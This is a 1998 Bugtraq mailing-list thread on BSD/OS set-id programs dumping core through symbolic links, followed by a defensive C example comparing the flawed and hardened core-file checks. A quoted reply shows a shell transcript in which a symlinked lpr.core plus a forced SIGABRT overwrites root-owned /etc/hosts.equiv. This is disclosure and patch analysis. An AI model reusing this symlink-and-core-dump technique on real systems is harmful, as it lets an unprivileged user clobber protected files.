Bugtraq mailing list archives

Re: BSD coredumps follow symlinks


From: ariel () FIREBALL TAU AC IL (Ariel Biener)
Date: Tue, 7 Apr 1998 02:43:46 +0300


On Mon, 6 Apr 1998, Ronny Cook wrote:

> lpr will dump core if there is no symlink there. Maybe you failed to
> install the patch correctly?

> If I recall rightly, the first patch disabled the most obvious attacks, but
> allowed a core dump for a setuid program across a symbolic link *if* the file
> existed and had 600 permissions (and was owned by the appropriate user).

You recall correctly. If one were to look at the bugtraq archives, one
would find my reply to Nir's letter, on Jun 20th '97:

`002810 97/06/20 20:53 66 Re: Core file anomalies under BSDi 3.0'


From:         Ariel Biener <ariel () FIREBALL TAU AC IL>
Subject:      Re: Core file anomalies under BSDi 3.0
X-To:         Nir Soffer <scorpios () CS HUJI AC IL>

On Thu, 19 Jun 1997, Nir Soffer wrote:

> [.snip.]
> A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
> program with privileges isn't necessary.
>
> B.) BSDi _does_ however, check if the file exists, so it's quite
> impossible to overwrite files.


Hmm, this is not my experience:

slingshot: {2} % id
uid=100(ariel) gid=20(staff) groups=20(staff), 0(wheel)
slingshot: {3} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  0 Jun 20 22:43 /etc/hosts.equiv
slingshot: {4} % ln -s /etc/hosts.equiv lpr.core
slingshot: {5} % lpr
^Z
Suspended
slingshot: {6} % kill -ABRT %1
slingshot: {7} % fg
lpr
Abort (core dumped)
slingshot: {8} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  167936 Jun 20 22:45 /etc/hosts.equiv
slingshot: {9} % su
Password:
Jun 20 22:46:34 slingshot su: ariel to root on /dev/ttyp0
slingshot: {1} % uname -a
BSD/OS slingshot.tau.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #0: Mon Jun 16
19:51:22 IDT 1997
root () slingshot tau ac il:/usr/src/sys/compile/SLINGSHOT  i386

It won't work if the target file is *not* mode 0600.

--Ariel

> Unfortunately, certain sensitive files (such as /etc/master.passwd) fit
> these conditions. Thus the later patch under 3.0, which disabled *any*
> core dump across a symbolic link for *any* setuid program.

Exactly. The 1st patch didn't fix it.



--Ariel

> Nir's test was only for a nonexistent file, which the earlier patch handles
> correctly. Unfortunately, in doing so it opens the other security hole
> which was later patched under 3.0.
>
>               ...Ronny
> --
> Ronald Cook, Technical Manager - Message Handling Systems/The Message eXchange
> Email: ronny () tmx com au ----- Phone: +61-2-9550-4448 ---- Fax: +61-2-9519-2551
>
> All opinions are my own and not those of TMX unless explicitly stated otherwise.


   +---------------------------------------------------------------+
   | Ariel Biener                                                  |
   | e-mail: ariel () post tau ac il        Work ph: 03-6406086       |
   | fingerprint = 07 D1 E5 3E EF 6D E5 82 0B E9 21 D4 3C 7D 8B BC |
   +---------------------------------------------------------------+
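The difference between the two BSD/OS patches discussed in this thread comes down to one call: stat() follows the symlink and so sees a root-owned 0600 file where lstat() sees a symlink. The following is an added example, not code from the thread or from BSD/OS: a user-space model of the two core-file open policies. policy_first_patch() behaves as Ronny and Ariel describe the first patch (exists, mode 0600, owned by the dumping credential, symlink silently followed), and policy_hardened() refuses the symlink outright, which is what an O_NOFOLLOW open enforces. The function names, the verdict enum and the temp-directory layout are assumptions made for this demo; the hardened policy refuses symlinks for every process, not only set-id ones, which is the example author's stricter choice rather than the exact behaviour of the second patch.

```c
/* Added example (not from the Bugtraq thread or BSD/OS): two models of the
 * core-file open check. Names, enum and temp layout are assumptions. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

enum core_verdict {
    CORE_ALLOW = 0,     /* write the core file here */
    CORE_DENY_SYMLINK,  /* path is a symbolic link */
    CORE_DENY_OWNER,    /* existing file not owned by the dumping uid */
    CORE_DENY_MODE,     /* existing file not mode 0600 */
    CORE_DENY_NOTREG,   /* existing path is not a regular file */
    CORE_DENY_LINKED    /* existing file has other hard links */
};

/* First-patch model: stat() resolves the symlink, so "lpr.core -> /etc/hosts.equiv"
 * passes every check as long as hosts.equiv is owned by dump_uid and is 0600,
 * exactly the case in the lpr transcript. dump_uid is the uid the core is
 * written as (the effective uid of the set-id program). */
enum core_verdict policy_first_patch(const char *path, uid_t dump_uid)
{
    struct stat st;
    if (stat(path, &st) != 0)            /* nonexistent: a fresh file is fine */
        return CORE_ALLOW;
    if (!S_ISREG(st.st_mode))
        return CORE_DENY_NOTREG;
    if (st.st_uid != dump_uid)
        return CORE_DENY_OWNER;
    if ((st.st_mode & 07777) != 0600)
        return CORE_DENY_MODE;
    return CORE_ALLOW;
}

/* Hardened model: lstat() does not follow the link, so the symlink itself is
 * inspected and refused before anything is opened. The real open would use
 * O_WRONLY|O_CREAT|O_NOFOLLOW so the kernel enforces the same thing without a
 * check-then-open race. The st_nlink test also closes the hard-link variant. */
enum core_verdict policy_hardened(const char *path, uid_t dump_uid)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return CORE_ALLOW;               /* real open: O_CREAT|O_EXCL|O_NOFOLLOW */
    if (S_ISLNK(st.st_mode))
        return CORE_DENY_SYMLINK;
    if (!S_ISREG(st.st_mode))
        return CORE_DENY_NOTREG;
    if (st.st_nlink != 1)
        return CORE_DENY_LINKED;
    if (st.st_uid != dump_uid)
        return CORE_DENY_OWNER;
    if ((st.st_mode & 07777) != 0600)
        return CORE_DENY_MODE;
    return CORE_ALLOW;
}

/* Constructed scenario in a temp directory: a 0600 "hosts.equiv" owned by the
 * caller (standing in for root's file, with the caller playing the set-id
 * euid) and a symlink "lpr.core" pointing at it, as in the transcript. Stores
 * each policy's verdict for the symlink in *first and *hardened. Returns 0 on
 * success, -1 if the scenario could not be built. */
int run_demo(enum core_verdict *first, enum core_verdict *hardened)
{
    char dir[] = "/tmp/coredemo.XXXXXX";
    char target[PATH_MAX], lnk[PATH_MAX];
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/hosts.equiv", dir);
    snprintf(lnk, sizeof lnk, "%s/lpr.core", dir);
    int fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;
    close(fd);
    if (symlink(target, lnk) != 0)
        return -1;
    *first = policy_first_patch(lnk, geteuid());
    *hardened = policy_hardened(lnk, geteuid());
    unlink(lnk);
    unlink(target);
    rmdir(dir);
    return 0;
}

int main(void)
{
    enum core_verdict a, b;
    if (run_demo(&a, &b) != 0) {
        perror("run_demo");
        return 1;
    }
    printf("first patch: %s, hardened: %s\n",
           a == CORE_ALLOW ? "ALLOW (core overwrites the target)" : "deny",
           b == CORE_DENY_SYMLINK ? "DENY_SYMLINK" : "other");
    return 0;
}
```

Run as an ordinary user: the first-patch model allows the dump through the symlink (the 167936-byte hosts.equiv in the transcript), while the hardened model refuses it. A modern kernel goes further and simply does not dump core for a process whose credentials changed at exec, which removes the whole class rather than patching individual checks.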
